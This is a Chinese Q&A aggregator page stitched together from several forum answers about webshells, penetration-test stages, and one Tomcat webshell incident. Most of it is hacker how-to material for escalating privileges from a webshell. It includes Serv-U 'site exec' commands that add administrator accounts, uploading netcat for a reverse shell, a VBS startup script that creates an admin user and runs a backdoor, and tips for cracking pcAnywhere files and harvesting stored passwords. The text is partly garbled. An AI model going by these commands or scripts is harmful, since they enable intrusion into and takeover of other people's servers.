黑客们常说的 拿到shell、 shell是什么意思 同理求问WEBSHELL是什么

黑客们常说的 拿到shell、 shell是什么意思 同理求问WEBSHELL是什么,第1张

在计算机科学中,Shell俗称壳(用来区别于核),是指“提供使用者使用界面”的软件(命令解析器)。用途 一般情况下: 使用用户的缺省凭证和环境执行 shell。shell 命令重新初始化用户的登录会话。当给出该命令时,就会重新设置进程的控制终端的端口特征,并取消对端口的所有访问。然后 shell 命令为用户把进程凭证和环境重新设置为缺省值,并执行用户的初始程序。根据调用进程的登录用户标识建立所有的凭证和环境。

"web" - 显然需要服务器开放web服务,"shell" - 取得对服务器某种程度上 *** 作权限。

webshell常常被称为匿名用户(入侵者)通过WEB服务端口对WEB服务器有某种程度上 *** 作的权限,由于其大多是以网页脚本的形式出现,也有人称之为网站后门工具。

webshell有什么作用?

一方面,webshell被站长常常用于网站管理、服务器管理等等,根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。

另一方面,被入侵者利用,从而达到控制网站服务器的目的。这些网页脚本常称为WEB

脚本木马,目前比较流行的asp或php木马,也有基于NET的脚本木马。

包含以下几个流程:

信息收集

第一步做的就是信息收集,根据网站URL可以查出一系列关于该网站的信息。通过URL我们可以查到该网站的IP、该网站 *** 作系统、脚本语言、在该服务器上是否还有其他网站等等一些列的信息。

漏洞探测

当我们收集到了足够多的信息之后,我们就要开始对网站进行漏洞探测了。探测网站是否存在一些常见的Web漏洞,比如:SQL注入 。

漏洞利用

探测到了该网站存在漏洞之后,就要对该漏洞进行利用了。不同的漏洞有不同的利用工具,很多时候,通过一个漏洞我们很难拿到网站的webshell,我们往往需要结合几个漏洞来拿webshell。

内网渗透

当我们能跟内网主机进行通信后,我们就要开始进行内网渗透了。可以先使用nmap对内网主机进行扫描,探测在线的主机,并且探测其使用的 *** 作系统、开放的端口等信息。

内网中也有可能存在供内网使用的内网服务器,可以进一步渗透拿下其权限。

痕迹清除

达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马。

撰写渗透测试保告

在完成了渗透测试之后,就需要对这次渗透测试撰写渗透测试报告了。明确的写出哪里存在漏洞,以及漏洞修补的方法。以便于网站管理员根据我们的渗透测试报告修补这些漏洞和风险,防止被黑客攻击。

其实也不难``

你上传一个cmdexe

文件

到webshell里``!

然后点cmd命令``

前面有一个根据什么文件打命令``

看你是什么ASP木马`

`~

然后你就能打dos命令了``

就可以运行你上传的文件了``

1、阿里云提示在xxxx服务器上发现木马文件,被植入了webshell。

2、木马文件路径:/web/tomcat-xxx/webapps/no3/ccjsp。

1、在未确认ccjsp文件功能之前,将webapps文件夹下的no3文件夹和no3war文件删除,同时将no3war文件备份到/home/xxx目录下。

2、同时将no3文件夹下的ccjsp文件发送到本地进行分析,确认是一个jsp的木马后门文件,可以获取远程服务器权限。

1、攻击者在webapps文件夹下上传了一个no3war文件,并创建了包含ccjsp木马文件的no3 文件夹,首先应找到上传的方式和路径。查看下网站,发现网站是采用的Tomcat容器。

2、进一步的思路是排查Tomcat本身的漏洞,查看Tomcat的配置文件tomcat-usersxml,发现Manager APP管理员弱口令。

3、可能的攻击思路是,通过Tomcat弱口令漏洞上传war格式的木马文件。

1、通过admin/admin弱口令登录 >

关于提权的方法太多,偶逃了两节课整理出下面几点偶辅导员不会看到了吧

一:利用serv-u本地提权使用最频繁所有提权中成功率最高

工具ftpexe

c:\winnt\system32\inetsrv\data\

C:\Documents and Settings\All Users\Documents

站点根目录

二:修改d:\Program Files\serv-u目录下的ServUDaemonini来提权

[USER=angel|1]

Password=ng98F85379EA68DBF97BAADCA99B69B805

HomeDir=D:\websites

RelPaths=1

TimeOut=600

Maintenance=System

Access1=D:\websites|RWAMELCDP

SKEYValues=

用户是angel 密码是 111111

在本地cmd上进行ftp命令

c:\>ftp ip

ftp>quote site exec net user 123$ 123456 /add

ftp>quote site exec net localgroup administrators 123$ /add

再在站点根目录上传ncexe进行反向连接

ftp>quote site exec d:\、 >

以前我看书专门找一些如何拿到后台webshell的文章(什么你连webshell都不知道,你可以下课了)从没想过我会拿到一个网站后台的webshell 那天我拿到一个网吧主机上的webshell,然缶筒恢涝趺瓷洗xe文件了 我的webshell是桂林老兵的asp站长助手,你也可以用海洋顶端或i冰狐浪子的asp木马,那个就得你自己想了老兵的里面有一项是上传模块 我以前只知道怎么上传asp木马,上传了一大堆还是不知道怎么上传exe想了好几天没想到,有一天无意中看一个动画是光屁股做的一个动画,我记得名字是从突破webshell到开对方338Array看完以后才知道原来满容易的我拿下的是网吧主机,两个硬盘都可以写比如说我这个点完上传那个后路径是D:\web\hstoe\newupasp 你如果是上传exe文件,你只要把newupasp改成newupexe就可以了或者别的以exe后缀的就可以了

说到花了九牛二虎的力气获得了一个webshell,

当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~

嘻嘻~~好跟我来,看看有什么可以利用的来提升权限

第一

如果服务器上有装了pcanywhere服务端,管理员为了管理方便

也给了我们方便,到系统盘的Documents and Settings/All Us

ers/Application Data/Symantec/pcAnywhere/中下载cif本地

破解就使用pcanywhere连接就ok了

第二

有很多小黑问我这么把webshell的iis user权限提升

一般服务器的管理都是本机设计完毕然后上传到空间里,

那么就会用到ftp,服务器使用最多的就是servu

那么我们就利用servu来提升权限

通过servu提升权限需要servu安装目录可写~

好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemonini把他下载

下来,然后在本机上安装一个servu把ServUDaemonini放到本地安装文件夹下覆盖,

启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限

然后去servu安装目录里把ServUDaemonini更换服务器上的。

用我新建的用户和密码连接~

好的,还是连上了

ftp

ftp>open ip

Connected to ip

220 Serv-U FTP Server v5004 for WinSock ready

User (ip:(none)): id //刚才添加的用户

331 User name okay, please send complete E-mail address as password

Password:password //密码

230 User logged in, proceed

ftp> cd winnt //进入win2k的winnt目录

250 Directory changed to /WINNT

ftp>cd system32 //进入system32目录

250 Directory changed to /WINNT/system32

ftp>quote site exec netexe user rover rover1234 /add //利用系统的netexe

文件加用户。

如果提示没有权限,那我们就

把后门(serverexe) 传他system32目录

然后写一个VBs教本

set wshshell=createobject ("wscriptshell")

a=wshshellrun ("cmdexe /c net user user pass /add",0)

b=wshshellrun ("cmdexe /c net localgroup Administrators user /add",0)

b=wshshellrun ("cmdexe /c serverexe",0)

存为xxvbe

这个教本的作用是建立user用户密码为pass

并且提升为管理员

然后执行system32目录下的serverexe

把这个教本传他 C:\Documents and Settings\All Users\「开始」菜单\程序\启动

目录

这样管理员只要一登陆就会执行那个教本

接下来就是等了等他登陆

第三

就是先检查有什么系统服务,或者随系统启动自动启动的程序和管理员经常使用的软件, 比如诺顿,VAdministrator,金山,瑞星,WinRAR甚至QQ之类的,是否可以写,如果可以就修改其程序, 绑定一个批处理或者VBS,然后还是等待服务器重启。

第四

查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码,可能会有所

收获等等。

第五

使用Flashfxp也能提升权限,但是成功率就看你自己的运气了

首先找到FlashFXP文件夹,打开(编辑)Sites dat,这个文件这是什么东西密码和用户名,

而且密码是

直接上传获取webshell,这种对php和jsp的一些程序比较常见,MolyXBOARD就是其中一例,直接在心情图标管理上传。

添加修改上传类型,现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型,bbsxp后台可以添加asa|asP类型,ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell了。

利用后台管理功能写入webshell,上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell比较的典型的有dvbbs60,还有leadbbs288等。

以上就是关于黑客们常说的 拿到shell、 shell是什么意思 同理求问WEBSHELL是什么全部的内容,包括:黑客们常说的 拿到shell、 shell是什么意思 同理求问WEBSHELL是什么、一个完整的渗透测试流程,分为那几块,每一块有哪些内容、拿到WEBSHELL后怎么让服务器运行上传的EXE文件等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!

欢迎分享,转载请注明来源:内存溢出

原文地址:https://54852.com/web/9759986.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-05-01
下一篇2023-05-01

发表评论

登录后才能评论

评论列表(0条)

    保存